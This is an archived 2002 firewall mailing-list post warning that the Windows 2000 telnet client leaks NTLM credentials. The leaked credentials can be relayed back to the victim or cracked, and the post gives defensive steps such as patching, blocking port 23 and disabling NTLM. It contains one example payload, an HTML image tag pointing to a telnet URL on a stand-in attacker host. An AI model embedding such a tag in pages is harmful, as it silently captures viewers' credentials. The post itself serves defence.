Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)

From: Mikael Olsson (mikael.olsson@clavister.com)
Date: 10/30/02


From: Mikael Olsson <mikael.olsson@clavister.com>
To: firewall-wizards@honor.icsalabs.com
Date: Wed Oct 30 14:20:02 2002


Mikael Olsson wrote:
>
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.

I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.

Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://evilserver.int:2323">

Stuff that can help:

- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
  and install patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet
  port. Disabling the telnet service might be a good idea, but don't
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

-- 
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW: http://www.clavister.com
Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."


Relevant Pages

  • RE: sshd for windows
    ... >NTLMv2 is an encryption method. ... Microsoft Telnet uses NTLM to encrypt the ... This means the only client that can access the server is the ... What’s NTLM? ...
    (Security-Basics)
  • Problem with Telnet and NTLM
    ... Simple Win2K domain, some member servers with Win2K SP4. ... We want to use Telnet with NTLM auth., ... The problem is, server's Telnet service doesn't ask for a username and password, simply lets in to the command prompt. ... Set NTLM command was issued on clients. ...
    (microsoft.public.win2000.general)
  • Re: Telnet port 25
    ... Subject: Telnet port 25 ... is the sole responsibility of the customer and depends on the customer's ... Configuring sendmail 8.11.0 for Anti-Relay ...
    (AIX-L)
  • Re: Linux Forums unreachable.
    ... DSL router, do you? ... web site that does not match linuxforums.org. ... interesting to see if the problem is specific to port 80. ... ray@RaysComputer:~$ telnet www.linuxforums.org 21 ...
    (Ubuntu)
  • Re: Suggestion for a lexical (login mode via TCPIP)
    ... Not sure of it is the right one to modify or to add another one, but it would be useful to be able to get information on whether the user us coming in via FTP, TELNET, etc. ... This would also allow a LOGIN.COM to check if someone is coming in through a secure/SSL port for instance. ... For the HP SSH server, it seems to be undefined. ... forget about the possibility of virtual terminals. ...
    (comp.os.vms)